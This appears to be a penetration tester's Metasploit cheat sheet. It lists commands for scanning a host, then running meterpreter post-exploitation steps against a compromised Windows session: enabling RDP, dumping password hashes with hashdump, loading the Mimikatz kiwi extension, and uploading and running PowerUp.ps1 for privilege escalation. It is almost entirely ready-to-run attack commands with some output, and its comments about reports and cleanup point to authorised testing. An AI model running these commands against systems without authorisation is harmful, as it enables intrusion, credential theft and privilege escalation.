Metasploit

# Nmap service/version scan (results are stored in the Metasploit database)
db_nmap -sV [IP]

hosts
services
vulns

sessions -i [session_id]

meterpreter > getuid
meterpreter > getprivs
meterpreter > sysinfo
meterpreter > ipconfig

# Is the target a virtual machine?
meterpreter > run post/windows/gather/checkvm

# Suggest local exploits applicable to the current session
meterpreter > run post/multi/recon/local_exploit_suggester 

# Enable RDP (changes the target's configuration: record it for the report and revert it during cleanup)
meterpreter > run post/windows/manage/enable_rdp

meterpreter > hashdump

# Mimikatz (kiwi extension, loaded from the meterpreter prompt)
load kiwi

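# PowerShell: PowerUp privilege-escalation checks
# (the uploaded PowerUp.ps1 stays on the target's disk: remove it during cleanup)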

meterpreter > upload /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1
[*] uploading  : /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 483.72 KiB of 483.72 KiB (100.0%): /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded   : /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
